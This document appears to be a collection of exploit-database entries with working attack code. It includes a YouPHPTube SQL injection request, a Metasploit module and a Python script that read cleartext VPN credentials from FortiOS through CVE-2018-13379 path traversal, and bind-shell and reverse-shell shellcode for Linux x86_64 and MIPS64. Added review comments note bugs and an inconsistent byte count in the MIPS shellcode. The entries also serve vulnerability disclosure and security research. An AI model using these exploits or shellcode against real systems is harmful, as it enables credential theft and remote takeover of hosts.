YouPHPTube 7.2 SQL Injection
YouPHPTube version 7.2 suffers from a remote SQL injection vulnerability in userCreate.json.php.
0c5a7e8e6f6f45c7826e5a19a22f0dea
# Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage: https://www.youphptube.com/
# Software Link: https://github.com/YouPHPTube/YouPHPTube
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430
The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example.
Example Request:
POST /objects/userCreate.json.php HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]
user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx
Methods for DB-Extraction are:
- Boolean-based blind
- Error-based
- AND/OR time-based blind
The vulnerability was fixed with this commit:
https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a
FortiOS 5.6.7 / 6.0.4 Credential Disclosure
This Metasploit module exploits FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 to leverage a credential disclosure vulnerability by reading the /dev/cmdb/sslvpn_websession file.
956f30465640700e922f5cf3e4a9bdf6
# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
  # Auxiliary (read-only) module: requests one path-traversal URI on the SSL VPN
  # web interface, and on an HTTP 200 writes the response body to a local file
  # and prints its printable runs. No payload is delivered.
  include Msf::Exploit::Remote::HttpClient
  include Msf::Post::File   # provides file_local_write used in run()

  # Module metadata. Defaults to HTTPS on port 443 (see 'DefaultOptions').
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'SSL VPN FortiOs - System file leak',
      'Description' => %q{
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
      },
      'References' =>
      [
        [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
      ],
      'Author' => [ 'lynx (Carlos Vieira)' ],
      'License' => MSF_LICENSE,
      'DefaultOptions' =>
      {
        'RPORT' => 443,
        'SSL' => true
      },
    ))
  end

  # Entry point. An HTTP 200 is taken as "vulnerable": the body is written to
  # msf_sslwebsession_<RHOST>.bin in the current directory (an existing file of
  # that name is deleted first) and then printed by parse(). A 404 is reported
  # as not vulnerable; any other outcome, including no response, as a generic
  # failure.
  def run()
    print_good("Checking target...")
    # Detection note: this exact path/query (traversal in the lang= parameter of
    # /remote/fgt_lang) is the observable indicator in web-server logs.
    res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})
    # NOTE(review): only the status code is checked, not the body, so any
    # handler that answers 200 for this path would be reported as vulnerable.
    if res && res.code == 200
      print_good("Target is Vulnerable!")
      data = res.body
      current_host = datastore['RHOST']
      filename = "msf_sslwebsession_"+current_host+".bin"
      File.delete(filename) if File.exist?(filename)
      file_local_write(filename, data)
      print_good("Parsing binary file.......")
      parse()
    else
      if(res && res.code == 404)
        print_error("Target not Vulnerable")
      else
        print_error("Ow crap, try again...")
      end
    end
  end

  # Re-reads the file written by run() (name re-derived from RHOST) and prints
  # it as rows of at most 60 characters with non-printable bytes replaced by
  # '.'; rows consisting only of dots are skipped.
  def parse()
    current_host = datastore['RHOST']
    # NOTE(review): File.new without a block/ensure - an exception inside the
    # loop leaves the handle open. File.open with a block would close it.
    fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
    words = 0   # unused
    # gets splits on 0x0a bytes, so a "line" is just a run of the binary file
    # between newline bytes, not a logical record.
    while (line = fileObj.gets)
      printable_data = line.gsub(/[^[:print:]]/, '.')
      # chunk into <=60-char pieces; /m so '.' also matches the trailing newline
      array_data = printable_data.scan(/.{1,60}/m)
      for ar in array_data
        if ar != "............................................................"
          print_good(ar)
        end
      end
      #print_good(printable_data)
    end
    fileObj.close
  end
end
FortiOS 5.6.7 / 6.0.4 Credential Disclosure
FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 suffer from a credential disclosure vulnerability.
a022f0e2fde0c635d9836c8aef10e213
# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affects FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4.
# Tested on: 5.6.6
# CVE : CVE-2018-13379
# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3
# Silences urllib3's InsecureRequestWarning; every request below passes verify=False.
urllib3.disable_warnings()
def leak(host, port):
    """Fetch the traversal URI over HTTPS and save the body when it looks like the target file.

    On success the raw response body is written to sslvpn_websession_<host>.dat
    in the current directory and handed to parse(); returns True. Returns False
    when the marker string is absent or the connection fails. `port` is a
    string (it is concatenated into the URL). Request exceptions other than
    ConnectionError propagate to the caller.
    """
    print("[!] Leak information...")
    try:
        url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
        headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
        # verify=False: certificate validation is skipped (warnings silenced at import time)
        r=requests.get(url, headers=headers, verify=False, stream=True)
        img=r.raw.read()
        # presence check only: any body containing this marker is saved as-is
        if "var fgt_lang =" in str(img):
            # NOTE(review): text-mode 'w' with the raw body works on Python 2 but
            # raises TypeError on Python 3; parse() also uses a Python 2 print
            # statement, so this script targets Python 2.
            with open("sslvpn_websession_"+host+".dat", 'w') as f:
                f.write(img)
            print("[>] Save to file ....")
            parse(host)
            print("\n")
            return True
        else:
            return False
    except requests.exceptions.ConnectionError:
        return False
def is_character_printable(s):
    """Return True when every character of `s` is printable ASCII (0x20-0x7e).

    Vacuously True for an empty string, matching the all()-based original.
    """
    for ch in s:
        code = ord(ch)
        if code < 32 or code > 126:
            return False
    return True
def is_printable(byte):
    """Return `byte` unchanged if it is printable ASCII, otherwise a single '.'."""
    return byte if is_character_printable(byte) else '.'
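def read_bytes(host, chunksize=8192):
    """Yield the bytes of sslvpn_websession_<host>.dat one at a time.

    The file is read in `chunksize`-byte pieces and each byte is yielded
    individually (on Python 3 these are ints, on Python 2 one-char strings).
    Raises IOError/OSError if the file does not exist. The log line now names
    the same path that is opened; the original omitted the underscore there.
    """
    path = "sslvpn_websession_" + host + ".dat"
    print("[>] Read bytes from > " + path)
    with open(path, "rb") as f:
        while True:
            chunk = f.read(chunksize)
            if not chunk:   # EOF: read() returns an empty buffer
                break
            for b in chunk:
                yield b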
def parse(host):
    """Print the saved file as 61-character rows of printable ASCII.

    Each byte is mapped through is_printable(); a row is flushed once 61 bytes
    have been accumulated (memory_address % 61 == 60) unless it is entirely
    dots. Bytes left over after the last full row are never printed.
    """
    print("[!] Parsing Information...")
    memory_address = 0   # running byte offset; only used for the row boundary
    ascii_string = ""
    # NOTE(review): on Python 2 read_bytes() yields 1-char strings; on Python 3
    # it would yield ints and ord() inside is_character_printable() would raise.
    for byte in read_bytes(host):
        ascii_string = ascii_string + is_printable(byte)
        if memory_address%61 == 60:
            if ascii_string!=".............................................................":
                # Python 2 print statement (the rest of the file uses print()
                # with a single argument, which parses under both versions).
                print ascii_string
            ascii_string = ""
        memory_address = memory_address + 1
def check(host, port):
    """Probe the traversal URI and report whether the target looks vulnerable.

    Returns True only on HTTP 200; a 404, any other status, and any exception
    all return False. `port` is a string and is concatenated into the URL.
    """
    print("[!] Check vuln...")
    uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    try:
        r = requests.get("https://" + host + ":" + port + uri, verify=False)
        # NOTE(review): status-code-only decision; a 200 from any handler
        # (e.g. a catch-all page) is reported as vulnerable.
        if(r.status_code == 200):
            return True
        elif(r.status_code == 404):
            return False
        else:
            return False
    # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
    # requests.exceptions.RequestException is the narrow form.
    except:
        return False
def main(host, port):
    """Run check() and, only when it returns True, leak().

    `port` is passed through as the string taken from argv; both callees
    build the URL by string concatenation.
    """
    print("[+] Start exploiting....")
    vuln = check(host, port)
    if(vuln):
        print("[+] Target is vulnerable!")
        bin_file = leak(host, port)   # holds leak()'s bool result; never read
    else:
        print("[X] Target not vulnerable.")
if __name__ == "__main__":
    # Usage: <host> <port>. The port is kept as a string; main() and its callees
    # concatenate it into the URL rather than converting it.
    if(len(sys.argv) < 3):
        print("Use: python {} ip/dns port".format(sys.argv[0]))
    else:
        host = sys.argv[1]
        port = sys.argv[2]
        main(host, port)
Linux/x86_64 TCP/4444 Bindshell With Password Shellcode
129 bytes small Linux/x86_64 bind (4444/TCP) shell (/bin/sh) + password (pass) shellcode.
4f69a9a7b34a1231bc105cb3374d328e
/*
; Title : Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes)
; Date : 2019-08-18
; Author : Gonçalo Ribeiro (@goncalor)
; Website : goncalor.com
; SLAE64-ID : 1635
global _start
%define pass "pass"
%define port 0x5c11 ; htons(4444)
_start:
jmp real_start
password: db pass
pass_len: db $-password
real_start:
socket:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; __NR_socket = 41
; On success, a file descriptor for the new socket is returned
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx)
syscall
push rax
pop rdi
bind:
; server.sin_family = AF_INET; short
; server.sin_port = htons(4444); unsigned short
; server.sin_addr.s_addr = INADDR_ANY; unsigned long
; bzero(&server.sin_zero, 8);
;
; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
; struct sockaddr_in {
; short sin_family;
; unsigned short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
;
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; INADDR_ANY = 0
; AF_INET = 2
; __NR_bind = 49
; On success, zero is returned
xor eax, eax ; shorter and will still zero the upper bytes
push rax ; sin_zero
push ax
push ax ; sin_addr
push word port
push word 2
; bind
add al, 49
push rsp
pop rsi
add dl, 16 ; sizeof(sockaddr_in)
syscall
listen:
; listen(sock, 2)
; __NR_listen = 50
; On success, zero is returned
mov al, 50
xor esi, esi
mov sil, 2
syscall
accept:
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; __NR_accept = 43
; On success, a file descriptor is returned
mov al, 43
xor esi, esi
;xor rdx, rdx ; already zeroed
syscall
push rax
;close:
; close(sock)
; __NR_close = 3
; returns zero on success
; closing is not strictly necessary
;mov al, 3
;syscall
dup2:
; dup2(new, 0);
; dup2(new, 1);
; dup2(new, 2);
; __NR_dup2 = 33
; On success, return the new file descriptor
pop rdi ; "new" was pushed in accept()
push 2
pop rsi
dup2_loop:
mov al, 33
syscall
dec esi
jns dup2_loop
read_password:
; read(int fd, void *buf, size_t count)
; On success, the number of bytes read is returned
;xor eax, eax ; already done by dup2
;rdi = "new" ; already done in dup2
push rax
push rax ; create space for "buf" in the stack
push rsp
pop rsi ; rsi = *buf
mov dl, 16
syscall
compare_password:
xor ecx, ecx
lea rdi, [rel pass_len]
mov cl, [rdi]
sub rdi, rcx
cld
repz cmpsb
jne exit
execve:
; execve(const char *path, char *const argv[], char *const envp[])
; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
; rsi, argv = (char**) (/bin//sh, 0x00)
; rdx, envp = &0x00
xor eax, eax
push rax
push rsp
pop rdx ; *rdx = &0x00
mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev)
push rsi
push rsp
pop rdi ; rdi = (char*) /bin//sh
push rax
push rdi
push rsp
pop rsi ; rsi = (char**) (/bin//sh, 0x00)
mov al, 59
syscall
exit:
;xor eax, eax ; upper bytes are zero after read
mov al, 60
syscall
*/
#include <stdio.h>
#include <string.h>
/* Assembled form of the NASM listing in the comment above: 129 bytes, matching
 * the title. The first 7 bytes are the jmp over the embedded password "pass"
 * (4 bytes) and its 1-byte length. The array contains no NUL byte, so strlen()
 * in main() reports the full length. It lives in writable data, not .text. */
char code[] =
"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f"
"\x05\x50\x5f\x31\xc0\x50\x66\x50\x66\x50\x66\x68\x11\x5c\x66\x6a\x02\x04"
"\x31\x54\x5e\x80\xc2\x10\x0f\x05\xb0\x32\x31\xf6\x40\xb6\x02\x0f\x05\xb0"
"\x2b\x31\xf6\x0f\x05\x50\x5f\x6a\x02\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8"
"\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31\xc9\x48\x8d\x3d\xad\xff\xff\xff\x8a"
"\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62"
"\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0"
"\x3c\x0f\x05";
/* Test harness: prints strlen(code) - equal to the full length only because
 * the payload has no NUL byte - then transfers control into the array. This
 * only runs if the data segment is executable; the listing gives no build
 * flags for that. The int(*)() cast discards any return value; the
 * payload's exit() path means main() normally does not resume. */
int main() {
printf("length: %lu\n", strlen(code));
((int(*)()) code)();
}
Linux/MIPS64 Reverse Shell Shellcode
157 bytes small Linux/MIPS64 reverse (localhost:4444/TCP) shell shellcode.
943dc4bcee3d0b33275bf2fdf8a0cb86
/*
* # Reverse shell shellcode for Linux MIPS64 (mips64el)
* # Default port: tcp/4444
* # Host: localhost
* # Date: August 19 - 2019
* # Author: Antonio de la Piedra
* # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta
* # Size: 157 bytes
* # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g
*/
#include <stdio.h>
#include <string.h>
/*
.text
.global __start
__start:
dli $s4, -3
dli $s5, -17
nor $a0,$s4,$zero
nor $a1,$s4,$zero
slti $a2,$zero,-1
li $v0,5040
syscall 0x40404
sw $v0, -32($sp)
lw $a0, -32($sp)
nor $t0,$s4,$zero
sw $t0, -12($sp)
dli $t2,0x5c11
sw $t2,-10($sp)
dli $t1,0x0101017f
sw $t1,-8($sp)
daddiu $a1,$sp,-12
nor $a2,$s5,$zero
dli $v0,5041
syscall 0x40404
nor $a1,$s4,$zero
dli $s0, -1
loop:
dli $v0,5032
syscall 0x40404
daddi $a1,$a1,-1
bne $a1,$s0,loop
dli $t0,0x69622f2f
sw $t0,-12($sp)
dli $t1,0x68732f6e
dli $t1,0x68732f6e
sw $t1,-8($sp)
sw $zero,-4($sp)
daddiu $a0,$sp,-12
slti $a1,$zero,-1
slti $a2,$zero,-1
dli $v0,5057
syscall 0x40404
.align 8
*/
/* Assembled form of the listing above, one 4-byte little-endian (mips64el)
 * instruction word per line; no word contains a NUL byte, so strlen() in
 * main() covers the whole array.
 * NOTE(review): 39 words are listed here (156 bytes) and the first word
 * (dli $s4,-3) appears twice, whereas the listing above repeats `dli $t1`
 * instead; the header states 157 bytes - worth re-checking against the
 * assembler output. */
unsigned char code[] =
"\xfd\xff\x14\x24"
"\xfd\xff\x14\x24"
"\xef\xff\x15\x24"
"\x27\x20\x80\x02"
"\x27\x28\x80\x02"
"\xff\xff\x06\x28"
"\xb0\x13\x02\x24"
"\x0c\x01\x01\x01"
"\xe0\xff\xa2\xaf"
"\xe0\xff\xa4\x8f"
"\x27\x60\x80\x02"
"\xf4\xff\xac\xaf"
"\x11\x5c\x0e\x24"
"\xf6\xff\xae\xaf"
"\x01\x01\x0d\x3c"
"\x7f\x01\xad\x35"
"\xf8\xff\xad\xaf"
"\xf4\xff\xa5\x67"
"\x27\x30\xa0\x02"
"\xb1\x13\x02\x24"
"\x0c\x01\x01\x01"
"\x27\x28\x80\x02"
"\xff\xff\x10\x24"
"\xa8\x13\x02\x24"
"\x0c\x01\x01\x01"
"\xff\xff\xa5\x60"
"\xfc\xff\xb0\x14"
"\x62\x69\x0c\x3c"
"\x2f\x2f\x8c\x35"
"\xf4\xff\xac\xaf"
"\x73\x68\x0d\x3c"
"\x6e\x2f\xad\x35"
"\xf8\xff\xad\xaf"
"\xfc\xff\xa0\xaf"
"\xf4\xff\xa4\x67"
"\xff\xff\x05\x28"
"\xff\xff\x06\x28"
"\xc1\x13\x02\x24"
"\x0c\x01\x01\x01";
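/* Test harness: prints strlen(code), then transfers control into the byte
 * array. The array lives in writable data, so this only works when the binary
 * is built as the header says (-z execstack); argc/argv are unused.
 * Fixes vs. the original: strlen() returns size_t, so the format is %zu
 * rather than %d; the array is unsigned char[], so it is cast explicitly for
 * strlen() and for the function pointer - the implicit conversions are
 * incompatible-pointer diagnostics (an error on newer compilers). */
int main(int argc, char ** argv)
{
    void (*s)(void);
    (void)argc;
    (void)argv;
    printf("Shellcode Length: %zu\n", strlen((const char *)code));
    s = (void (*)(void))code;
    s();
    return 0;
}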